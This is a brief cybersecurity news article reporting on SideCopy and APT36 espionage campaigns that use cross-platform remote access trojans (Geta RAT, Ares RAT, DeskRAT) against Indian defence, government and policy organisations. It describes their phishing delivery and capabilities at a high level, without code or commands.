Recent cyber espionage efforts have focused on Indian defense and government-aligned organizations, employing cross-platform remote access trojans (RATs) to compromise both Windows and Linux environments. These campaigns are linked to malware families such as Geta RAT, Ares RAT, and DeskRAT, attributed to the threat groups known as SideCopy and APT36 (also referred to as Transparent Tribe).
Campaign Overview
SideCopy has been active since at least 2019 and is believed to operate as a subdivision of APT36. According to Aditya K. Sood, vice president of Security Engineering and AI Strategy at Aryaka, these campaigns reflect a refined approach to espionage rather than a complete overhaul. The groups are enhancing their tactics by expanding cross-platform capabilities and utilizing advanced delivery methods.
Attack Vectors
Phishing emails are the primary attack vector, often containing malicious attachments or links that direct targets to infrastructure controlled by the attackers. These emails typically deliver Windows shortcuts (LNK files), ELF binaries, or PowerPoint Add-In files that initiate a multi-stage process to deploy the trojans. For instance, one attack chain involves a malicious LNK file that executes mshta.exe to run an HTML Application (HTA) file, which then decrypts and executes a DLL payload.
Malware Capabilities
The malware is designed to maintain persistent remote access, conduct system reconnaissance, and collect sensitive data. Geta RAT can execute various commands, including gathering credentials, capturing screenshots, and managing file operations. In parallel, a Linux variant utilizes a Go binary to deploy Ares RAT, which also supports a range of commands for data harvesting.
Strategic Targeting
Aryaka has noted that these campaigns are not limited to the defense sector but extend to policy, research, and critical infrastructure organizations. The use of DeskRAT alongside other RATs signifies a sophisticated toolkit aimed at ensuring stealth and long-term access to compromised systems. The deployment of these malware families underscores a deliberate strategy to exploit trusted infrastructures and impersonate official documents.
This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.
